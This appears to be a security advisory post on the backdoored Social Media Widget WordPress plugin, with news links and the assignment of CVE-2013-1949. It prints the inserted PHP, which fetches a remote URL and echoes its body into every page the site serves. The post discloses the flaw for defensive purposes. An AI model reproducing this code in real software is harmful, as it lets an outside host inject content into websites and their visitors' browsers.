http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html
http://securityledger.com/hacked-wordpress-plug-in-put-on-double-secret-probation/
http://it.slashdot.org/story/13/04/13/212226/popular-wordpress-plug-in-caught-spamming-is-put-on-probation
So the company responsible for Social Media Widget claims that a rogue
developer they contracted inserted this code:
    $smw_url = "hxxp://i.aaur.net/i.php";
    if(!function_exists("smw_get")){
        function smw_get($f) {
            // fetch the remote URL through the WordPress HTTP API
            $response = wp_remote_get( $f );
            if( is_wp_error( $response ) ) {
                // fall back to raw curl if the WP fetch failed
                function smw_get_body($f) {
                    $ch = @curl_init();
                    @curl_setopt($ch, CURLOPT_URL, $f);
                    @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                    $output = @curl_exec($ch);
                    @curl_close($ch);
                    return $output;
                }
                echo smw_get_body($f);
            } else {
                // remote body is written straight into the generated page
                echo $response["body"];
            }
        }
        smw_get($smw_url);
    }
Regardless of HOW this code got into the plugin, it represents a
significant security issue. Any site using this plugin is pulling
"hxxp://i.aaur.net/i.php" and including it in the page they generate
and send to a user. This opens up a huge can of worms: anyone that can
man-in-the-middle your server can now inject PHP into your blog, or
anything sent to the clients/etc.
Please use CVE-2013-1949 for this issue.